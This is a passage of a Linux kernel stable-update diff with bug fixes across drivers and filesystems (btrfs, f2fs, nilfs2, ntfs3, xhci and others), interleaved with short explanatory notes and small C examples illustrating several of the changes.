++		  (((dummybytes) * 8) / (op)->dummy.buswidth) : \
+ 		  0))
+ 
+ #define CDNS_XSPI_CMD_FLD_DSEQ_CMD_4(op, chipsel) ( \
+@@ -352,6 +356,7 @@ static int cdns_xspi_send_stig_command(struct cdns_xspi_dev *cdns_xspi,
+ 	u32 cmd_regs[6];
+ 	u32 cmd_status;
+ 	int ret;
++	int dummybytes = op->dummy.nbytes;
+ 
+ 	ret = cdns_xspi_wait_for_controller_idle(cdns_xspi);
+ 	if (ret < 0)
+@@ -366,7 +371,12 @@ static int cdns_xspi_send_stig_command(struct cdns_xspi_dev *cdns_xspi,
+ 	memset(cmd_regs, 0, sizeof(cmd_regs));
+ 	cmd_regs[1] = CDNS_XSPI_CMD_FLD_P1_INSTR_CMD_1(op, data_phase);
+ 	cmd_regs[2] = CDNS_XSPI_CMD_FLD_P1_INSTR_CMD_2(op);
+-	cmd_regs[3] = CDNS_XSPI_CMD_FLD_P1_INSTR_CMD_3(op);
++	if (dummybytes != 0) {
++		cmd_regs[3] = CDNS_XSPI_CMD_FLD_P1_INSTR_CMD_3(op, 1);
++		dummybytes--;
++	} else {
++		cmd_regs[3] = CDNS_XSPI_CMD_FLD_P1_INSTR_CMD_3(op, 0);
++	}
+ 	cmd_regs[4] = CDNS_XSPI_CMD_FLD_P1_INSTR_CMD_4(op,
+ 						       cdns_xspi->cur_cs);
+ 
+@@ -376,7 +386,7 @@ static int cdns_xspi_send_stig_command(struct cdns_xspi_dev *cdns_xspi,
+ 		cmd_regs[0] = CDNS_XSPI_STIG_DONE_FLAG;
+ 		cmd_regs[1] = CDNS_XSPI_CMD_FLD_DSEQ_CMD_1(op);
+ 		cmd_regs[2] = CDNS_XSPI_CMD_FLD_DSEQ_CMD_2(op);
+-		cmd_regs[3] = CDNS_XSPI_CMD_FLD_DSEQ_CMD_3(op);
++		cmd_regs[3] = CDNS_XSPI_CMD_FLD_DSEQ_CMD_3(op, dummybytes);
+ 		cmd_regs[4] = CDNS_XSPI_CMD_FLD_DSEQ_CMD_4(op,
+ 							   cdns_xspi->cur_cs);
+ 
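MODE_NO_OF_BYTES above is a two-bit field at bits 25:24 of the command register, filled with FIELD_PREP() when one dummy byte is re-purposed as a mode byte. The same mask/shift arithmetic, modelled without the kernel headers; MY_GENMASK/MY_FIELD_PREP are local stand-ins, not the <linux/bitfield.h> macros:

#include <stdint.h>
#include <stdio.h>

/* Local stand-ins for the kernel's GENMASK()/FIELD_PREP(), 32-bit only. */
#define MY_GENMASK(h, l)	((~0u >> (31 - (h))) & ~((1u << (l)) - 1u))
#define MY_FIELD_PREP(mask, val) \
	(((uint32_t)(val) << __builtin_ctz(mask)) & (mask))

#define MODE_NO_OF_BYTES	MY_GENMASK(25, 24)	/* bits 25:24, as in the patch */

int main(void)
{
	/* One mode byte, as programmed when a dummy byte is consumed. */
	uint32_t reg = MY_FIELD_PREP(MODE_NO_OF_BYTES, 1);

	printf("reg = %#010x\n", reg);	/* prints 0x01000000 */
	return 0;
}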
+diff --git a/drivers/tty/serial/imx.c b/drivers/tty/serial/imx.c
+index 40e59e72d5e9e..5acbab0512b82 100644
+--- a/drivers/tty/serial/imx.c
++++ b/drivers/tty/serial/imx.c
+@@ -1303,7 +1303,7 @@ static void imx_uart_clear_rx_errors(struct imx_port *sport)
+ 
+ }
+ 
+-#define TXTL_DEFAULT 2 /* reset default */
++#define TXTL_DEFAULT 8
+ #define RXTL_DEFAULT 8 /* 8 characters or aging timer */
+ #define TXTL_DMA 8 /* DMA burst setting */
+ #define RXTL_DMA 9 /* DMA burst setting */
+diff --git a/drivers/usb/host/xhci-ring.c b/drivers/usb/host/xhci-ring.c
+index 7549c430c4f01..be5b0ff2966fe 100644
+--- a/drivers/usb/host/xhci-ring.c
++++ b/drivers/usb/host/xhci-ring.c
+@@ -2631,16 +2631,17 @@ static int handle_tx_event(struct xhci_hcd *xhci,
+ 			else
+ 				xhci_handle_halted_endpoint(xhci, ep, 0, NULL,
+ 							    EP_SOFT_RESET);
+-			goto cleanup;
++			break;
+ 		case COMP_RING_UNDERRUN:
+ 		case COMP_RING_OVERRUN:
+ 		case COMP_STOPPED_LENGTH_INVALID:
+-			goto cleanup;
++			break;
+ 		default:
+ 			xhci_err(xhci, "ERROR Transfer event for unknown stream ring slot %u ep %u\n",
+ 				 slot_id, ep_index);
+ 			goto err_out;
+ 		}
++		return 0;
+ 	}
+ 
+ 	/* Count current td numbers if ep->skip is set */
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index 77f24168c7ed2..676978f2e9944 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -1720,8 +1720,17 @@ void btrfs_reclaim_bgs_work(struct work_struct *work)
+ next:
+ 		if (ret) {
+ 			/* Refcount held by the reclaim_bgs list after splice. */
+-			btrfs_get_block_group(bg);
+-			list_add_tail(&bg->bg_list, &retry_list);
++			spin_lock(&fs_info->unused_bgs_lock);
++			/*
++			 * This block group might have been added to the
++			 * unused list during the above process; if it was
++			 * not, move it back to the reclaim list.
++			 */
++			if (list_empty(&bg->bg_list)) {
++				btrfs_get_block_group(bg);
++				list_add_tail(&bg->bg_list, &retry_list);
++			}
++			spin_unlock(&fs_info->unused_bgs_lock);
+ 		}
+ 		btrfs_put_block_group(bg);
+ 
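The fix above takes unused_bgs_lock and re-queues the block group onto the retry list only when bg->bg_list is empty, so the group can never sit on two lists at once. The shape of that idiom as a kernel-style sketch; get_ref() and the list names are generic stand-ins, not btrfs API:

/* Sketch: requeue only if no competing path claimed the object.
 * 'lock' is the same lock the unused-list path takes before linking,
 * and get_ref() stands in for btrfs_get_block_group().
 */
spin_lock(&lock);
if (list_empty(&obj->list)) {		/* not claimed meanwhile */
	get_ref(obj);			/* reference held by the retry list */
	list_add_tail(&obj->list, &retry_list);
}
spin_unlock(&lock);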
+diff --git a/fs/btrfs/scrub.c b/fs/btrfs/scrub.c
+index 12a2b1e3f1e35..f48895a9b165e 100644
+--- a/fs/btrfs/scrub.c
++++ b/fs/btrfs/scrub.c
+@@ -3407,7 +3407,7 @@ static int scrub_simple_mirror(struct scrub_ctx *sctx,
+ 	const u32 max_length = SZ_64K;
+ 	struct btrfs_path path = { 0 };
+ 	u64 cur_logical = logical_start;
+-	int ret;
++	int ret = 0;
+ 
+ 	/* The range must be inside the bg */
+ 	ASSERT(logical_start >= bg->start && logical_end <= bg->start + bg->length);
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index b54d681c6457d..a02c748753161 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -68,7 +68,7 @@ enum {
+ 
+ struct f2fs_fault_info {
+ 	atomic_t inject_ops;
+-	unsigned int inject_rate;
++	int inject_rate;
+ 	unsigned int inject_type;
+ };
+ 
+@@ -4530,10 +4530,14 @@ static inline bool f2fs_need_verity(const struct inode *inode, pgoff_t idx)
+ }
+ 
+ #ifdef CONFIG_F2FS_FAULT_INJECTION
+-extern void f2fs_build_fault_attr(struct f2fs_sb_info *sbi, unsigned int rate,
+-							unsigned int type);
++extern int f2fs_build_fault_attr(struct f2fs_sb_info *sbi, unsigned long rate,
++							unsigned long type);
+ #else
+-#define f2fs_build_fault_attr(sbi, rate, type)		do { } while (0)
++static inline int f2fs_build_fault_attr(struct f2fs_sb_info *sbi,
++					unsigned long rate, unsigned long type)
++{
++	return 0;
++}
+ #endif
+ 
+ static inline bool is_journalled_quota(struct f2fs_sb_info *sbi)
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index f496622921843..6bd8c231069ad 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -63,21 +63,31 @@ const char *f2fs_fault_name[FAULT_MAX] = {
+ 	[FAULT_LOCK_OP]		= "lock_op",
+ };
+ 
+-void f2fs_build_fault_attr(struct f2fs_sb_info *sbi, unsigned int rate,
+-							unsigned int type)
++int f2fs_build_fault_attr(struct f2fs_sb_info *sbi, unsigned long rate,
++							unsigned long type)
+ {
+ 	struct f2fs_fault_info *ffi = &F2FS_OPTION(sbi).fault_info;
+ 
+ 	if (rate) {
++		if (rate > INT_MAX)
++			return -EINVAL;
+ 		atomic_set(&ffi->inject_ops, 0);
+-		ffi->inject_rate = rate;
++		ffi->inject_rate = (int)rate;
+ 	}
+ 
+-	if (type)
+-		ffi->inject_type = type;
++	if (type) {
++		if (type >= BIT(FAULT_MAX))
++			return -EINVAL;
++		ffi->inject_type = (unsigned int)type;
++	}
+ 
+ 	if (!rate && !type)
+ 		memset(ffi, 0, sizeof(struct f2fs_fault_info));
++	else
++		f2fs_info(sbi,
++			"build fault injection attr: rate: %lu, type: 0x%lx",
++								rate, type);
++	return 0;
+ }
+ #endif
+ 
+@@ -916,14 +926,17 @@ static int parse_options(struct super_block *sb, char *options, bool is_remount)
+ 		case Opt_fault_injection:
+ 			if (args->from && match_int(args, &arg))
+ 				return -EINVAL;
+-			f2fs_build_fault_attr(sbi, arg, F2FS_ALL_FAULT_TYPE);
++			if (f2fs_build_fault_attr(sbi, arg,
++					F2FS_ALL_FAULT_TYPE))
++				return -EINVAL;
+ 			set_opt(sbi, FAULT_INJECTION);
+ 			break;
+ 
+ 		case Opt_fault_type:
+ 			if (args->from && match_int(args, &arg))
+ 				return -EINVAL;
+-			f2fs_build_fault_attr(sbi, 0, arg);
++			if (f2fs_build_fault_attr(sbi, 0, arg))
++				return -EINVAL;
+ 			set_opt(sbi, FAULT_INJECTION);
+ 			break;
+ #else
+diff --git a/fs/f2fs/sysfs.c b/fs/f2fs/sysfs.c
+index 751a108e612ff..06d5791afe90e 100644
+--- a/fs/f2fs/sysfs.c
++++ b/fs/f2fs/sysfs.c
+@@ -451,10 +451,16 @@ static ssize_t __sbi_store(struct f2fs_attr *a,
+ 	if (ret < 0)
+ 		return ret;
+ #ifdef CONFIG_F2FS_FAULT_INJECTION
+-	if (a->struct_type == FAULT_INFO_TYPE && t >= BIT(FAULT_MAX))
+-		return -EINVAL;
+-	if (a->struct_type == FAULT_INFO_RATE && t >= UINT_MAX)
+-		return -EINVAL;
++	if (a->struct_type == FAULT_INFO_TYPE) {
++		if (f2fs_build_fault_attr(sbi, 0, t))
++			return -EINVAL;
++		return count;
++	}
++	if (a->struct_type == FAULT_INFO_RATE) {
++		if (f2fs_build_fault_attr(sbi, t, 0))
++			return -EINVAL;
++		return count;
++	}
+ #endif
+ 	if (a->struct_type == RESERVED_BLOCKS) {
+ 		spin_lock(&sbi->stat_lock);
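After this change both the mount options and the sysfs knobs funnel through f2fs_build_fault_attr(), which rejects rates above INT_MAX and type bitmaps at or above BIT(FAULT_MAX) instead of silently truncating them. A simplified, runnable model of those two range checks (the real FAULT_MAX lives in f2fs.h, so the value below is only illustrative, and the kernel additionally skips validation for zero values):

#include <limits.h>
#include <stdio.h>

#define FAULT_MAX  21U			/* illustrative; the real value is in f2fs.h */
#define BIT(n)     (1UL << (n))

static int build_fault_attr(unsigned long rate, unsigned long type)
{
	if (rate > INT_MAX)
		return -1;		/* -EINVAL in the kernel */
	if (type >= BIT(FAULT_MAX))
		return -1;		/* type bits beyond FAULT_MAX rejected */
	return 0;
}

int main(void)
{
	printf("%d\n", build_fault_attr(100, 0x3));			/* 0 */
	printf("%d\n", build_fault_attr((unsigned long)INT_MAX + 1, 0));	/* -1 */
	return 0;
}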
+diff --git a/fs/jffs2/super.c b/fs/jffs2/super.c
+index 7ea37f49f1e18..e71f4c94c4483 100644
+--- a/fs/jffs2/super.c
++++ b/fs/jffs2/super.c
+@@ -58,6 +58,7 @@ static void jffs2_i_init_once(void *foo)
+ 	struct jffs2_inode_info *f = foo;
+ 
+ 	mutex_init(&f->sem);
++	f->target = NULL;
+ 	inode_init_once(&f->vfs_inode);
+ }
+ 
+diff --git a/fs/nilfs2/alloc.c b/fs/nilfs2/alloc.c
+index 7342de296ec3c..25881bdd212b8 100644
+--- a/fs/nilfs2/alloc.c
++++ b/fs/nilfs2/alloc.c
+@@ -377,11 +377,12 @@ void *nilfs_palloc_block_get_entry(const struct inode *inode, __u64 nr,
+  * @target: offset number of an entry in the group (start point)
+  * @bsize: size in bits
+  * @lock: spin lock protecting @bitmap
++ * @wrap: whether to wrap around
+  */
+ static int nilfs_palloc_find_available_slot(unsigned char *bitmap,
+ 					    unsigned long target,
+ 					    unsigned int bsize,
+-					    spinlock_t *lock)
++					    spinlock_t *lock, bool wrap)
+ {
+ 	int pos, end = bsize;
+ 
+@@ -397,6 +398,8 @@ static int nilfs_palloc_find_available_slot(unsigned char *bitmap,
+ 
+ 		end = target;
+ 	}
++	if (!wrap)
++		return -ENOSPC;
+ 
+ 	/* wrap around */
+ 	for (pos = 0; pos < end; pos++) {
+@@ -495,9 +498,10 @@ int nilfs_palloc_count_max_entries(struct inode *inode, u64 nused, u64 *nmaxp)
+  * nilfs_palloc_prepare_alloc_entry - prepare to allocate a persistent object
+  * @inode: inode of metadata file using this allocator
+  * @req: nilfs_palloc_req structure exchanged for the allocation
++ * @wrap: whether to wrap around
+  */
+ int nilfs_palloc_prepare_alloc_entry(struct inode *inode,
+-				     struct nilfs_palloc_req *req)
++				     struct nilfs_palloc_req *req, bool wrap)
+ {
+ 	struct buffer_head *desc_bh, *bitmap_bh;
+ 	struct nilfs_palloc_group_desc *desc;
+@@ -516,7 +520,7 @@ int nilfs_palloc_prepare_alloc_entry(struct inode *inode,
+ 	entries_per_group = nilfs_palloc_entries_per_group(inode);
+ 
+ 	for (i = 0; i < ngroups; i += n) {
+-		if (group >= ngroups) {
++		if (group >= ngroups && wrap) {
+ 			/* wrap around */
+ 			group = 0;
+ 			maxgroup = nilfs_palloc_group(inode, req->pr_entry_nr,
+@@ -541,7 +545,13 @@ int nilfs_palloc_prepare_alloc_entry(struct inode *inode,
+ 				bitmap = bitmap_kaddr + bh_offset(bitmap_bh);
+ 				pos = nilfs_palloc_find_available_slot(
+ 					bitmap, group_offset,
+-					entries_per_group, lock);
++					entries_per_group, lock, wrap);
++				/*
++				 * Since the search for a free slot in the
++				 * second and subsequent bitmap blocks always
++				 * starts from the beginning, the wrap flag
++				 * only has an effect on the first search.
++				 */
+ 				if (pos >= 0) {
+ 					/* found a free entry */
+ 					nilfs_palloc_group_desc_add_entries(
+diff --git a/fs/nilfs2/alloc.h b/fs/nilfs2/alloc.h
+index b667e869ac076..d825a9faca6d9 100644
+--- a/fs/nilfs2/alloc.h
++++ b/fs/nilfs2/alloc.h
+@@ -50,8 +50,8 @@ struct nilfs_palloc_req {
+ 	struct buffer_head *pr_entry_bh;
+ };
+ 
+-int nilfs_palloc_prepare_alloc_entry(struct inode *,
+-				     struct nilfs_palloc_req *);
++int nilfs_palloc_prepare_alloc_entry(struct inode *inode,
++				     struct nilfs_palloc_req *req, bool wrap);
+ void nilfs_palloc_commit_alloc_entry(struct inode *,
+ 				     struct nilfs_palloc_req *);
+ void nilfs_palloc_abort_alloc_entry(struct inode *, struct nilfs_palloc_req *);
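The wrap flag threaded through the allocator above lets the DAT keep its old wrap-around search, while the ifile, which must never hand out reserved inode numbers below NILFS_FIRST_INO, now fails with -ENOSPC instead of wrapping back to slot 0. A small self-contained model of such a bitmap search:

#include <stdbool.h>
#include <stdio.h>

/* Find a zero bit at or after 'start'; optionally wrap to the beginning. */
static int find_slot(const unsigned char *bitmap, unsigned int start,
		     unsigned int nbits, bool wrap)
{
	for (unsigned int pos = start; pos < nbits; pos++)
		if (!(bitmap[pos / 8] & (1u << (pos % 8))))
			return pos;
	if (!wrap)
		return -1;			/* -ENOSPC in the kernel */
	for (unsigned int pos = 0; pos < start; pos++)
		if (!(bitmap[pos / 8] & (1u << (pos % 8))))
			return pos;
	return -1;
}

int main(void)
{
	unsigned char bitmap[2] = { 0xff, 0xfe };	/* only bit 8 is free */

	printf("wrap=1 from 12: %d\n", find_slot(bitmap, 12, 16, true));	/* 8 */
	printf("wrap=0 from 12: %d\n", find_slot(bitmap, 12, 16, false));	/* -1 */
	return 0;
}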
+diff --git a/fs/nilfs2/dat.c b/fs/nilfs2/dat.c
+index 1e7f653c1df7e..242cc36bf1e97 100644
+--- a/fs/nilfs2/dat.c
++++ b/fs/nilfs2/dat.c
+@@ -75,7 +75,7 @@ int nilfs_dat_prepare_alloc(struct inode *dat, struct nilfs_palloc_req *req)
+ {
+ 	int ret;
+ 
+-	ret = nilfs_palloc_prepare_alloc_entry(dat, req);
++	ret = nilfs_palloc_prepare_alloc_entry(dat, req, true);
+ 	if (ret < 0)
+ 		return ret;
+ 
+diff --git a/fs/nilfs2/dir.c b/fs/nilfs2/dir.c
+index e9668e455a35e..4bba1970ad333 100644
+--- a/fs/nilfs2/dir.c
++++ b/fs/nilfs2/dir.c
+@@ -143,6 +143,9 @@ static bool nilfs_check_page(struct page *page)
+ 			goto Enamelen;
+ 		if (((offs + rec_len - 1) ^ offs) & ~(chunk_size-1))
+ 			goto Espan;
++		if (unlikely(p->inode &&
++			     NILFS_PRIVATE_INODE(le64_to_cpu(p->inode))))
++			goto Einumber;
+ 	}
+ 	if (offs != limit)
+ 		goto Eend;
+@@ -168,6 +171,9 @@ static bool nilfs_check_page(struct page *page)
+ 	goto bad_entry;
+ Espan:
+ 	error = "directory entry across blocks";
++	goto bad_entry;
++Einumber:
++	error = "disallowed inode number";
+ bad_entry:
+ 	nilfs_error(sb,
+ 		    "bad entry in directory #%lu: %s - offset=%lu, inode=%lu, rec_len=%d, name_len=%d",
+diff --git a/fs/nilfs2/ifile.c b/fs/nilfs2/ifile.c
+index a8a4bc8490b4d..ac10a62a41e98 100644
+--- a/fs/nilfs2/ifile.c
++++ b/fs/nilfs2/ifile.c
+@@ -55,13 +55,10 @@ int nilfs_ifile_create_inode(struct inode *ifile, ino_t *out_ino,
+ 	struct nilfs_palloc_req req;
+ 	int ret;
+ 
+-	req.pr_entry_nr = 0;  /*
+-			       * 0 says find free inode from beginning
+-			       * of a group. dull code!!
+-			       */
++	req.pr_entry_nr = NILFS_FIRST_INO(ifile->i_sb);
+ 	req.pr_entry_bh = NULL;
+ 
+-	ret = nilfs_palloc_prepare_alloc_entry(ifile, &req);
++	ret = nilfs_palloc_prepare_alloc_entry(ifile, &req, false);
+ 	if (!ret) {
+ 		ret = nilfs_palloc_get_entry_block(ifile, req.pr_entry_nr, 1,
+ 						   &req.pr_entry_bh);
+diff --git a/fs/nilfs2/nilfs.h b/fs/nilfs2/nilfs.h
+index aecda4fc95f5f..a1ff52265e1b0 100644
+--- a/fs/nilfs2/nilfs.h
++++ b/fs/nilfs2/nilfs.h
+@@ -116,9 +116,15 @@ enum {
+ #define NILFS_FIRST_INO(sb) (((struct the_nilfs *)sb->s_fs_info)->ns_first_ino)
+ 
+ #define NILFS_MDT_INODE(sb, ino) \
+-	((ino) < NILFS_FIRST_INO(sb) && (NILFS_MDT_INO_BITS & BIT(ino)))
++	((ino) < NILFS_USER_INO && (NILFS_MDT_INO_BITS & BIT(ino)))
+ #define NILFS_VALID_INODE(sb, ino) \
+-	((ino) >= NILFS_FIRST_INO(sb) || (NILFS_SYS_INO_BITS & BIT(ino)))
++	((ino) >= NILFS_FIRST_INO(sb) ||				\
++	 ((ino) < NILFS_USER_INO && (NILFS_SYS_INO_BITS & BIT(ino))))
++
++#define NILFS_PRIVATE_INODE(ino) ({					\
++	ino_t __ino = (ino);						\
++	((__ino) < NILFS_USER_INO && (__ino) != NILFS_ROOT_INO &&	\
++	 (__ino) != NILFS_SKETCH_INO); })
+ 
+ /**
+  * struct nilfs_transaction_info: context information for synchronization
+diff --git a/fs/nilfs2/the_nilfs.c b/fs/nilfs2/the_nilfs.c
+index 71400496ed365..be41e26b78246 100644
+--- a/fs/nilfs2/the_nilfs.c
++++ b/fs/nilfs2/the_nilfs.c
+@@ -452,6 +452,12 @@ static int nilfs_store_disk_layout(struct the_nilfs *nilfs,
+ 	}
+ 
+ 	nilfs->ns_first_ino = le32_to_cpu(sbp->s_first_ino);
++	if (nilfs->ns_first_ino < NILFS_USER_INO) {
++		nilfs_err(nilfs->ns_sb,
++			  "too small lower limit for non-reserved inode numbers: %u",
++			  nilfs->ns_first_ino);
++		return -EINVAL;
++	}
+ 
+ 	nilfs->ns_blocks_per_segment = le32_to_cpu(sbp->s_blocks_per_segment);
+ 	if (nilfs->ns_blocks_per_segment < NILFS_SEG_MIN_BLOCKS) {
+diff --git a/fs/nilfs2/the_nilfs.h b/fs/nilfs2/the_nilfs.h
+index cd4ae1b8ae165..17fee562ee503 100644
+--- a/fs/nilfs2/the_nilfs.h
++++ b/fs/nilfs2/the_nilfs.h
+@@ -182,7 +182,7 @@ struct the_nilfs {
+ 	unsigned long		ns_nrsvsegs;
+ 	unsigned long		ns_first_data_block;
+ 	int			ns_inode_size;
+-	int			ns_first_ino;
++	unsigned int		ns_first_ino;
+ 	u32			ns_crc_seed;
+ 
+ 	/* /sys/fs/<nilfs>/<device> */
+diff --git a/fs/ntfs3/xattr.c b/fs/ntfs3/xattr.c
+index d98cf7b382bcc..2e4eea854bda5 100644
+--- a/fs/ntfs3/xattr.c
++++ b/fs/ntfs3/xattr.c
+@@ -217,8 +217,11 @@ static ssize_t ntfs_list_ea(struct ntfs_inode *ni, char *buffer,
+ 		if (!ea->name_len)
+ 			break;
+ 
+-		if (ea->name_len > ea_size)
++		if (ea->name_len > ea_size) {
++			ntfs_set_state(ni->mi.sbi, NTFS_DIRTY_ERROR);
++			err = -EINVAL; /* corrupted fs */
+ 			break;
++		}
+ 
+ 		if (buffer) {
+ 			/* Check if we can use field ea->name */
+diff --git a/fs/orangefs/super.c b/fs/orangefs/super.c
+index 4ca8ed410c3cf..24e028c119c1b 100644
+--- a/fs/orangefs/super.c
++++ b/fs/orangefs/super.c
+@@ -201,7 +201,8 @@ static int orangefs_statfs(struct dentry *dentry, struct kstatfs *buf)
+ 		     (long)new_op->downcall.resp.statfs.files_avail);
+ 
+ 	buf->f_type = sb->s_magic;
+-	memcpy(&buf->f_fsid, &ORANGEFS_SB(sb)->fs_id, sizeof(buf->f_fsid));
++	buf->f_fsid.val[0] = ORANGEFS_SB(sb)->fs_id;
++	buf->f_fsid.val[1] = ORANGEFS_SB(sb)->id;
+ 	buf->f_bsize = new_op->downcall.resp.statfs.block_size;
+ 	buf->f_namelen = ORANGEFS_NAME_MAX;
+ 
+diff --git a/include/linux/fsnotify.h b/include/linux/fsnotify.h
+index bb8467cd11ae2..34f242105be23 100644
+--- a/include/linux/fsnotify.h
++++ b/include/linux/fsnotify.h
+@@ -93,7 +93,13 @@ static inline int fsnotify_file(struct file *file, __u32 mask)
+ {
+ 	const struct path *path = &file->f_path;
+ 
+-	if (file->f_mode & FMODE_NONOTIFY)
++	/*
++	 * FMODE_NONOTIFY fds are generated by fanotify itself and should
++	 * not generate new events. We also don't want events for FMODE_PATH
++	 * fds (that would mean open & close events) as they are just handle
++	 * creation / destruction events and not "real" file events.
++	 */
++	if (file->f_mode & (FMODE_NONOTIFY | FMODE_PATH))
+ 		return 0;
+ 
+ 	return fsnotify_parent(path->dentry, mask, path, FSNOTIFY_EVENT_PATH);
+diff --git a/include/linux/lsm_hook_defs.h b/include/linux/lsm_hook_defs.h
+index 6239a378c0ea8..0b4f7289951a4 100644
+--- a/include/linux/lsm_hook_defs.h
++++ b/include/linux/lsm_hook_defs.h
+@@ -382,7 +382,7 @@ LSM_HOOK(int, 0, key_getsecurity, struct key *key, char **_buffer)
+ 
+ #ifdef CONFIG_AUDIT
+ LSM_HOOK(int, 0, audit_rule_init, u32 field, u32 op, char *rulestr,
+-	 void **lsmrule)
++	 void **lsmrule, gfp_t gfp)
+ LSM_HOOK(int, 0, audit_rule_known, struct audit_krule *krule)
+ LSM_HOOK(int, 0, audit_rule_match, u32 secid, u32 field, u32 op, void *lsmrule)
+ LSM_HOOK(void, LSM_RET_VOID, audit_rule_free, void *lsmrule)
+diff --git a/include/linux/mutex.h b/include/linux/mutex.h
+index a33aa9eb9fc3b..5b5630e58407a 100644
+--- a/include/linux/mutex.h
++++ b/include/linux/mutex.h
+@@ -21,6 +21,8 @@
+ #include <linux/debug_locks.h>
+ #include <linux/cleanup.h>
+ 
++struct device;
++
+ #ifdef CONFIG_DEBUG_LOCK_ALLOC
+ # define __DEP_MAP_MUTEX_INITIALIZER(lockname)			\
+ 		, .dep_map = {					\
+@@ -171,6 +173,31 @@ do {							\
+ } while (0)
+ #endif /* CONFIG_PREEMPT_RT */
+ 
++#ifdef CONFIG_DEBUG_MUTEXES
++
++int __devm_mutex_init(struct device *dev, struct mutex *lock);
++
++#else
++
++static inline int __devm_mutex_init(struct device *dev, struct mutex *lock)
++{
++	/*
++	 * When CONFIG_DEBUG_MUTEXES is off, mutex_destroy() is just a nop,
++	 * so there is no real need to register it with the devm subsystem.
++	 */
++	return 0;
++}
++
++#endif
++
++#define devm_mutex_init(dev, mutex)			\
++({							\
++	typeof(mutex) mutex_ = (mutex);			\
++							\
++	mutex_init(mutex_);				\
++	__devm_mutex_init(dev, mutex_);			\
++})
++
+ /*
+  * See kernel/locking/mutex.c for detailed documentation of these APIs.
+  * Also see Documentation/locking/mutex-design.rst.
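devm_mutex_init() above pairs mutex_init() with a device-managed mutex_destroy() (registered via devm_add_action_or_reset() when CONFIG_DEBUG_MUTEXES is set), so a driver no longer needs an explicit destroy in its remove path. A hedged sketch of how a probe routine would use it; foo_probe and struct foo_priv are hypothetical, only devm_mutex_init() comes from the patch:

/* Hypothetical probe; illustrative use of the new helper. */
static int foo_probe(struct platform_device *pdev)
{
	struct foo_priv *priv;
	int ret;

	priv = devm_kzalloc(&pdev->dev, sizeof(*priv), GFP_KERNEL);
	if (!priv)
		return -ENOMEM;

	/* Registers mutex_destroy() as a devm action under
	 * CONFIG_DEBUG_MUTEXES; otherwise just mutex_init().
	 */
	ret = devm_mutex_init(&pdev->dev, &priv->lock);
	if (ret)
		return ret;

	platform_set_drvdata(pdev, priv);
	return 0;
}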
+diff --git a/include/linux/security.h b/include/linux/security.h
+index 2772f6375f140..c33c95f409eb6 100644
+--- a/include/linux/security.h
++++ b/include/linux/security.h
+@@ -1921,7 +1921,8 @@ static inline int security_key_getsecurity(struct key *key, char **_buffer)
+ 
+ #ifdef CONFIG_AUDIT
+ #ifdef CONFIG_SECURITY
+-int security_audit_rule_init(u32 field, u32 op, char *rulestr, void **lsmrule);
++int security_audit_rule_init(u32 field, u32 op, char *rulestr, void **lsmrule,
++			     gfp_t gfp);
+ int security_audit_rule_known(struct audit_krule *krule);
+ int security_audit_rule_match(u32 secid, u32 field, u32 op, void *lsmrule);
+ void security_audit_rule_free(void *lsmrule);
+@@ -1929,7 +1930,7 @@ void security_audit_rule_free(void *lsmrule);
+ #else
+ 
+ static inline int security_audit_rule_init(u32 field, u32 op, char *rulestr,
+-					   void **lsmrule)
++					   void **lsmrule, gfp_t gfp)
+ {
+ 	return 0;
+ }
+diff --git a/kernel/auditfilter.c b/kernel/auditfilter.c
+index 42d99896e7a6e..6c9a4d322309f 100644
+--- a/kernel/auditfilter.c
++++ b/kernel/auditfilter.c
+@@ -529,7 +529,8 @@ static struct audit_entry *audit_data_to_entry(struct audit_rule_data *data,
+ 			entry->rule.buflen += f_val;
+ 			f->lsm_str = str;
+ 			err = security_audit_rule_init(f->type, f->op, str,
+-						       (void **)&f->lsm_rule);
++						       (void **)&f->lsm_rule,
++						       GFP_KERNEL);
+ 			/* Keep currently invalid fields around in case they
+ 			 * become valid after a policy reload. */
+ 			if (err == -EINVAL) {
+@@ -798,7 +799,7 @@ static inline int audit_dupe_lsm_field(struct audit_field *df,
+ 
+ 	/* our own (refreshed) copy of lsm_rule */
+ 	ret = security_audit_rule_init(df->type, df->op, df->lsm_str,
+-				       (void **)&df->lsm_rule);
++				       (void **)&df->lsm_rule, GFP_KERNEL);
+ 	/* Keep currently invalid fields around in case they
+ 	 * become valid after a policy reload. */
+ 	if (ret == -EINVAL) {
+diff --git a/kernel/dma/map_benchmark.c b/kernel/dma/map_benchmark.c
+index af661734e8f90..dafdc47ae5fcc 100644
+--- a/kernel/dma/map_benchmark.c
++++ b/kernel/dma/map_benchmark.c
+@@ -252,6 +252,9 @@ static long map_benchmark_ioctl(struct file *file, unsigned int cmd,
+ 		 * dma_mask changed by benchmark
+ 		 */
+ 		dma_set_mask(map->dev, old_dma_mask);
++
++		if (ret)
++			return ret;
+ 		break;
+ 	default:
+ 		return -EINVAL;
+diff --git a/kernel/exit.c b/kernel/exit.c
+index bccfa4218356e..156283b3c1bf6 100644
+--- a/kernel/exit.c
++++ b/kernel/exit.c
+@@ -481,6 +481,8 @@ void mm_update_next_owner(struct mm_struct *mm)
+ 	 * Search through everything else, we should not get here often.
+ 	 */
+ 	for_each_process(g) {
++		if (atomic_read(&mm->mm_users) <= 1)
++			break;
+ 		if (g->flags & PF_KTHREAD)
+ 			continue;
+ 		for_each_thread(g, c) {
+diff --git a/kernel/locking/mutex-debug.c b/kernel/locking/mutex-debug.c
+index bc8abb8549d20..6e6f6071cfa27 100644
+--- a/kernel/locking/mutex-debug.c
++++ b/kernel/locking/mutex-debug.c
+@@ -12,6 +12,7 @@
+  */
+ #include <linux/mutex.h>
+ #include <linux/delay.h>
++#include <linux/device.h>
+ #include <linux/export.h>
+ #include <linux/poison.h>
+ #include <linux/sched.h>
+@@ -89,6 +90,17 @@ void debug_mutex_init(struct mutex *lock, const char *name,
+ 	lock->magic = lock;
+ }
+ 
++static void devm_mutex_release(void *res)
++{
++	mutex_destroy(res);
++}
++
++int __devm_mutex_init(struct device *dev, struct mutex *lock)
++{
++	return devm_add_action_or_reset(dev, devm_mutex_release, lock);
++}
++EXPORT_SYMBOL_GPL(__devm_mutex_init);
++
+ /***
+  * mutex_destroy - mark a mutex unusable
